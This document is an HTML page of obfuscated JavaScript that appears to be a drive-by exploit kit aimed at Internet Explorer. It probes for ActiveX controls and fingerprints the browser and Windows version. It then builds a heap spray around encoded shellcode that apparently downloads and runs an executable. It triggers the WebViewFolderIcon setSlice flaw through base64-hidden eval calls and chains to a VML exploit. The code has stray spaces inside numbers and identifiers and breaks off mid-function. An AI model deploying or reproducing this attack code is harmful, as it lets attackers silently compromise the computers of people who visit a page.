<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns:IE>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251">
<IE:clientCaps ID="oClientCaps" /><!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html xmlns:v="urn:schemas-microsoft-com:vml">
<head>
<script>
var isya = 1;
var isfl = 1;
var isya2 = 1;
var issdk = 1;
</script>
<object classid="clsid:201EA564-A6F6-11D1-811D-00C04FB6BD36" id="sdk" onerror="issdk=0;"></object>
<object classid="CLSID:7EC7B6C5-25BD-4586-A641-D2ACBB6629DD" onerror="isya2=0;" ></object>
<object classid="clsid:10072CEC-8CC1-11D1-986E-00A0C955B42E" id="VMLRender" ></object>
<object classid="clsid:00000535-0000-0010-8000-00AA006D2EA4" id="obj" ></object>
<object classid="clsid:9D39223E-AE8E-11D4-8FD3-00D0B7730277" id="target" onerror="isya=0;"></object>
<OBJECT ID='WZFILEVIEW' WIDTH=1 HEIGHT=1 CLASSID='CLSID:A09AE68F-B14D-43ED-B713-BA413F034904'></OBJECT>
<style>
v\:* { behavior: url(#VMLRender); }
</style>
</head>
<body><div id='exp'></div>
<script language="javascript">
var up_code = String.fromCharCode(37,117,57,48,57,48,37,117,57,4 8,57,48,37,117,53,52,101,98,37,117,55,53,56,98,37, 117,56,98,51,99,37,117,51,53,55,52,37,117,48,51,55 ,56,37,117,53,54,102,53,37,117,55,54,56,98,37,117, 48,51,50,48,37,117,51,51,102,53,37,117,52,57,99,57 ,37,117,97,100,52,49,37,117,100,98,51,51,37,117,48 ,102,51,54,37,117,49,52,98,101,37,117,51,56,50,56, 37,117,55,52,102,50,37,117,99,49,48,56,37,117,48,1 00,99,98,37,117,100,97,48,51,37,117,101,98,52,48,3 7,117,51,98,101,102,37,117,55,53,100,102,37,117,53 ,101,101,55,37,117,53,101,56,98,37,117,48,51,50,52 ,37,117,54,54,100,100,37,117,48,99,56,98,37,117,56 ,98,52,98,37,117,49,99,53,101,37,117,100,100,48,51 ,37,117,48,52,56,98,37,117,48,51,56,98,37,117,99,5 1,99,53,37,117,55,50,55,53,37,117,54,100,54,99,37, 117,54,101,54,102,37,117,54,52,50,101,37,117,54,99 ,54,99,37,117,52,51,48,48,37,117,53,99,51,97,37,11 7,50,101,53,53,37,117,55,56,54,53,37,117,48,48,54, 53,37,117,99,48,51,51,37,117,48,51,54,52,37,117,51 ,48,52,48,37,117,48,99,55,56,37,117,52,48,56,98,37 ,117,56,98,48,99,37,117,49,99,55,48,37,117,56,98,9 7,100,37,117,48,56,52,48,37,117,48,57,101,98,37,11 7,52,48,56,98,37,117,56,100,51,52,37,117,55,99,52, 48,37,117,52,48,56,98,37,117,57,53,51,99,37,117,56 ,101,98,102,37,117,48,101,52,101,37,117,101,56,101 ,99,37,117,102,102,56,52,37,117,102,102,102,102,37 ,117,101,99,56,51,37,117,56,51,48,52,37,117,50,52, 50,99,37,117,102,102,51,99,37,117,57,53,100,48,37, 117,98,102,53,48,37,117,49,97,51,54,37,117,55,48,5 0,102,37,117,54,102,101,56,37,117,102,102,102,102, 37,117,56,98,102,102,37,117,50,52,53,52,37,117,56, 100,102,99,37,117,98,97,53,50,37,117,100,98,51,51, 37,117,53,51,53,51,37,117,101,98,53,50,37,117,53,5 1,50,52,37,117,100,48,102,102,37,117,98,102,53,100 ,37,117,102,101,57,56,37,117,48,101,56,97,37,117,5 3,51,101,56,37,117,102,102,102,102,37,117,56,51,10 2,102,37,117,48,52,101,99,37,117,50,99,56,51,37,11 7,54,50,50,52,37,117,100,48,102,102,37,117,55,101, 98,102,37,117,101,50,100,56,37,117,101,56,55,51,37 ,117,102,102,52,48,37,117,102,102,102,102,37,117,1 02,102,53,50,37,117,101,56,100,48,37,117,102,102,1 00,55,37,117,102,102,102,102,37,117,55,52,54,56,37 ,117,55,48,55,52,37,117,50,102,51,97,37,117,51,54, 50,102,37,117,50,101,51,54,37,117,51,52,51,50,37,1 17,50,101,51,54,37,117,51,50,51,55,37,117,51,50,50 ,101,37,117,51,48,51,48,37,117,54,53,50,102,37,117 ,54,53,55,56,37,117,55,48,50,101,37,117,55,48,54,5 6,37,117,48,48,48,48);
var keyStr = "ABCDEFGHIJKLMNOP" + "QRSTUVWXYZabcdef" + "ghijklmnopqrstuv" + "wxyz0123456789+/" + "=";
function decode64(input)
{
var output = "";
var chr1, chr2, chr3 = "";
var enc1, enc2, enc3, enc4 = "";
var i = 0;
var base64test = /[^A-Za-z0-9\+\/\=]/g;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
do
{
enc1 = keyStr.indexOf(input.charAt(i++));
enc2 = keyStr.indexOf(input.charAt(i++));
enc3 = keyStr.indexOf(input.charAt(i++));
enc4 = keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 << 2) | (enc2 >> 4);
chr2 = ((enc2 & 15) << 4) | (enc3 >> 2);
chr3 = ((enc3 & 3) << 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64)
{
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64)
{
output = output + String.fromCharCode(chr3);
}
chr1 = chr2 = chr3 = "";
enc1 = enc2 = enc3 = enc4 = "";
}
while (i < input.length);
return output;
}
function testBrowser()
{
if ( document.defaultCharset != '' && document.defaultCharset != undefined && document.characterSet == undefined && document.body)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("MSIE")+5,3);
var browser = "MSIE";
}
if (window.opera && document.defaultCharset == undefined && document.characterSet != "" && document.characterSet != undefined && self.innerHeight)
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Opera")+6,4);
var browser = "Opera";
}
if (document.defaultCharset == undefined && !window.opera && document.characterSet != "" && (self.innerHeight))
{
productVersion=window.navigator.userAgent.substr(w indow.navigator.userAgent.indexOf("Gecko")+6,8)+ ' ('+ window.navigator.userAgent.substr(8,3) + ')';
var browser = "Firefox";
}
if (productVersion == "")
{
var browser = window.navigator.userAgent;
}
return browser;
}
function getVersion()
{
var osversion = "";
var osplatform = "";
osversion = navigator.appVersion;
osplatform = navigator.platform
if (osplatform.search("Win32") != -1)
{
if (osversion.indexOf('Windows 95') != -1) return "95"
else if (osversion.indexOf('Windows NT 4') != -1) return "NT"
else if (osversion.indexOf('Win 9x 4.9') != -1) return "ME"
else if (osversion.indexOf('Windows 98') != -1) return "98"
else if (osversion.indexOf('SV1') != -1) return "SP2"
else if (osversion.indexOf('Windows NT 5.0') != -1) return "2K"
else if (osversion.indexOf('Windows NT 5.1') != -1) return "XP"
else if (osversion.indexOf('Windows NT 5.2') != -1) return "2K3"
}
}
function makeMemory()
{
var up_payLoad = unescape(up_code);
up_memBlock = eval(String.fromCharCode(117,110,101,115,99,97,112 ,101))(String.fromCharCode(37,117,48,53,48,53,37,1 17,48,53,48,53));
up_memSize = 20;
up_memDump = up_memSize+up_payLoad.length;
while (up_memBlock.length<up_memDump)
{
up_memBlock+=up_memBlock;
}
up_memFill = up_memBlock.substring(0, up_memDump);
up_tempBlock = up_memBlock.substring(0, up_memBlock.length-up_memDump);
while(up_tempBlock.length+up_memDump<0x40000)
{
eval("up_tempBlock = up_tempBlock+up_tempBlock+up_memFill");
}
up_myMemory = new Array();
for (i=0;i<350;i++) up_myMemory[i] = eval("up_tempBlock + up_payLoad");
isMemory = true;
}
function findOffset(OffsetSlide, OffsetSlideSize)
{
while (OffsetSlide.length*2<OffsetSlideSize)
{
OffsetSlide+=OffsetSlide;
}
OffsetSlide=OffsetSlide.substring(0,OffsetSlideSiz e/2);
return OffsetSlide;
}
function setslice_exploit()
{
if (isMemory == false ) makeMemory();
count = 129-1;
for(i=0;i<count;i++)
try
{
var slice = eval(decode64('bmV3IEFjdGl2ZVhPYmplY3QoJ1dlYlZpZXd Gb2xkZXJJY29uLldlYlZpZXdGb2xkZXJJY29uLjEnKTs='));
eval(decode64('c2xpY2Uuc2V0U2xpY2UoMHg3ZmZmZmZmZSw gMHgwNTA1MDUwNSwgMHgwNTA1MDUwNSwweDA1MDUwNTA1ICk7' ));
}
catch(e){}
setTimeout("vml_exploit();",interval * 500);
}